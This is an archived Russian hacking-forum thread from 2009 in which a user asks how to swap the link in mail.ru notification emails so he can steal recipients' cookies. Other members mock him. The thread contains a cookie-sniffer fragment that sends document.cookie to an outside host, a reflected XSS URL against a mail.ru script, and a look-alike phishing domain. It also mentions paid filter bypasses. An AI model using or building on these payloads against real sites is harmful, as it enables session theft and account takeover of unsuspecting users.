Просмотр полной версии : помогите с xxs подменная ссылки
Dima201992
11.02.2009, 10:32
вот на mail.ru когда тебе пишут в мир тебе приходит письмо на почту
например автор Мой Мир@Mail.Ru
Тема друг прислал Вам новое личное сообщение!
мы заходим
От кого:
Щелкни, чтобы пообщаться с этим человеком в Mail.Ru Агенте Мой Мир@Mail.Ru <myadmin@corp.mail.ru> в адресную книгу • в чёрный список • в фильтры
Кому: dima201992@mail.ru
Дата: 11 Фев 2009 09:20:34
Тема: друг прислал Вам новое личное сообщение!
***********************************************
Dima @@@!
DIMA (. Y .) прислал Вам новое личное сообщение на проекте Мой Мир.
Чтобы прочитать его, пройдите по ссылке.
С уважением,
администрация проекта
Мой Мир@Mail.Ru
_______________
Отписаться от рассылки уведомлений.
ну вот мне надо пройдите по ссылке. вставить свою ссылочку чтобы украсть куки http://na-s.ru/images/MID_1.gif?"+document.cookie;</script>
подскажите как это зделать
Dima201992
11.02.2009, 18:00
хм что никто не знает ???
Dima201992
11.02.2009, 18:05
ты щас довыебуешся :((99999
не понял
Cthulchu
11.02.2009, 18:10
это кандидат в баны, не парься. Ты не сможешь изменить ссылку в уже отправленых письмах. Это тебе ответ. Если ответ не кореектен - задай вопрос корректно.
на нас ру куки не летят =/
AkyHa_MaTaTa
11.02.2009, 18:25
Что бы проделать выше перечисленое тебе нужно будет взламать mail.ru и в письмах которые отправляет ихний робот вставить xss,удачи.
Dima201992
11.02.2009, 18:31
Что бы проделать выше перечисленое тебе нужно будет взламать mail.ru и в письмах которые отправляет ихний робот вставить xss,удачи.
а есть анонимная отправка письма знаеш такое??
Dima201992
11.02.2009, 18:32
http://sin3v.org/services/anonym/index.php
вот сервис вот так можно отправить
Dima201992
11.02.2009, 18:38
ну и кто даст ответ ?
Dima201992
11.02.2009, 18:46
бля вы где
да давай тебе денег сразу дадим?
Dima201992
11.02.2009, 19:00
да давай тебе денег сразу дадим?
давай
Dima201992
11.02.2009, 19:02
тебе сколько выслать?
сколько тебе не жалко
вот 1500, больше пока нету
http://onclick.narod.ru/money/rubl/500r/500r1.jpg
http://onclick.narod.ru/money/rubl/500r/500r1.jpg
http://nensberg.narod.ru/russia/img01/04r100-2.jpg
http://nensberg.narod.ru/russia/img01/04r100-2.jpg
http://nensberg.narod.ru/russia/img01/04r100-2.jpg
http://nensberg.narod.ru/russia/img01/04r100-2.jpg
http://nensberg.narod.ru/russia/img01/04r100-2.jpg
Dima201992
11.02.2009, 19:20
ок давай
Dima201992
11.02.2009, 19:47
НЕТ ТАКИХ ЛЮДЕЙ??? КОТОРЫЕ ЗНАЮ
AkyHa_MaTaTa
11.02.2009, 19:52
На вот после вчерашнего осталось немного
http://www.allcredit.com.ua/assets/templates/allcredits/monets/oval.jpg
http://coins2001.narod.ru/nis/ukr/1k/1ka.jpg
http://coins2001.narod.ru/nis/ukr/2k/2ka.jpg
http://coins2001.narod.ru/nis/ukr/5k/5ka.jpg
http://coins2001.narod.ru/nis/ukr/10k/10ka.jpg
http://coins2001.narod.ru/nis/ukr/25k/25ka.jpg
http://coins2001.narod.ru/nis/ukr/1g/1gb.jpg
По сабжекту, если ты хочешь отслать письмо с подельным адресом то это сути дела не меняет так как письма жертва будет считывать в конечном итоге со своего почтового яшика на mail.ru, а паблик обходов фильтра нету на mail.ru, за это $ платят.
Dima201992
11.02.2009, 20:06
http://forum.blackhack.ru/showthread.php?t=6371&highlight=Sin3v
посмотри это видео здесь как то подменили ссылку
AkyHa_MaTaTa
11.02.2009, 20:09
http://forum.blackhack.ru/showthread.php?t=6371&highlight=Sin3v
посмотри это видео здесь как то подменили ссылку
Дай сылку на видео, впадлу регится.
Dima201992
11.02.2009, 20:16
Дай сылку на видео, впадлу регится.
http://dump.ru/file/1528524
Dima201992
11.02.2009, 20:29
посмотрел?
Dima201992
11.02.2009, 21:37
AkyHa_MaTaTa ты где пропал
Dima201992
12.02.2009, 10:02
его съели
еге
Ээээ... Подменить ссылку? Чёто я несовсем понял, но мб ТС имеет в виду HTML письмо, типа
<a href="http://copr.ma1l.ru/">http://copr.mail.ru/</a>
Меня так на фейк словили :(
===============
ОМГ!!!!!!
Пасмарел видео, значете что такое подменая ссылка?!
<a href="http://my_url/">пройдите по ссылке</a>
В РОТ МНЕ НОГИ! ПОДСЕННАЯ ССЫЛКА!!! :eek: :eek: :eek: :eek: :eek: :eek:
Этож превад!!!
В двух словах, тама показано как через пассивку увести куки, но сама XSS не показана, и готов поспорить что у ТСа её нет
Короче стебите ТСа дальше
Dima201992
12.02.2009, 18:47
ну кто может кто то знает как это зделать
Читай выше тебе написали.
Dima201992
12.02.2009, 19:35
Читай выше тебе написали.
и че прочитал и че дальше пробывал подменить на свою ссылку нифига выдает полностю код
Ржунимагу
12.02.2009, 20:26
=\ тебе xxs-ка нужна!!!
Ржунимагу
12.02.2009, 20:28
для начала...
Dima201992
14.02.2009, 15:14
для начала...
http://list.mail.ru/cgi-bin/olympic_calendar.cgi?sport=%22%3E%3Cscript%3Ealert (document.cookie)%3C/script%3E
вот
Dima201992
14.02.2009, 15:17
как туда свой сниффер приклеить??? вот мой снифер
http://na-s.ru/images/MID_1.gif?"+document.cookie;</script>
Ржунимагу
14.02.2009, 15:39
http://list.mail.ru/cgi-bin/olympic_calendar.cgi?sport=%22%3E%3Cscript%3Ealert (document.cookie)%3C/script%3E
вот
Она не пашет - это старье!! поэтому куки тебе и не преходят!!!
Ты человек ебло.
1)Чтобы прокатило такое,тебе необходимо иметь обход фильтра <script> который стоит денег(больших).
2)Либо пассивку
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot